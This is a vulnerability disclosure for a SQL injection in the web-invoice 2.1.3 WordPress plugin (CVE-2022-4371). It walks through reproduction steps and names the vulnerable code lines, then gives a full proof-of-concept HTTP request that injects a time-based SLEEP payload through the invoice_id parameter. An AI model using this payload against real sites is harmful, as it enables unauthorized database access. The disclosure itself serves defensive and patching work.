web-invoice 2.1.3 (1/2) WordPress plugin SQL injection
|Date of Disclosure||December 12 2022|
|Affected Software Type||WordPress plugin|
|CVSS 3.x Base Score||n/a|
|CVSS 2.0 Base Score||n/a|
|Reporter||Daniel Krohmer, Kunal Sharma|
|Link to Affected Software||https://wordpress.org/plugins/web-invoice|
|Link to Vulnerability DB||https://nvd.nist.gov/vuln/detail/CVE-2022-4371|
invoice_id query parameter in web-invoice 2.1.3 is vulnerable to to SQL injection. An authenticated attacker may abuse the
new_web_invoice page of the plugin to craft a malicious GET request. Depending on the plugin settings, this attack may impact any user role (subscriber or higher).
This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.
In the plugin settings, any user role can be assigned to invoice management. In this example, we use a low-privilege
Create a new invoice for an arbitrary user:
Fill out the form and submit the invoice by clicking on
Save and Preview:
Go to the invoice overview by clicking on
Web Invoice, then click on the subject that has just been created.
Scroll down and hit
Clicking the previous button triggers the vulnerable request.
invoide_id is the vulnerable query parameter
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of
invoice_id at line 40 in
./Functions.php at line 75, the parameter is passed to the function
In this function, the malicious database is crafted at line 503 of
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below.
GET /wp-admin/admin.php?page=new_web_invoice&invoice_id=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/wp-admin/admin.php?page=new_web_invoice&web_invoice_action=doInvoice&invoice_id=31618572 Cookie: wordpress_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C4d290f74d0fdee6ed52774b0827884c4a4ac8f0515fbe0c2ccd89c9093b52f90; wplrp_subscriber_id=6; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1669972640%7C%7C1669969040%7C%7C4e12cab99480b80c0ee581a6517239e4; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wp-settings-time-1=1669802217; wp-settings-time-2=1669824525; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C7264237c5bb535f6d1e5efa1bf3cb1db26c41b5a279f134aa8004c585e6e0ee7 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1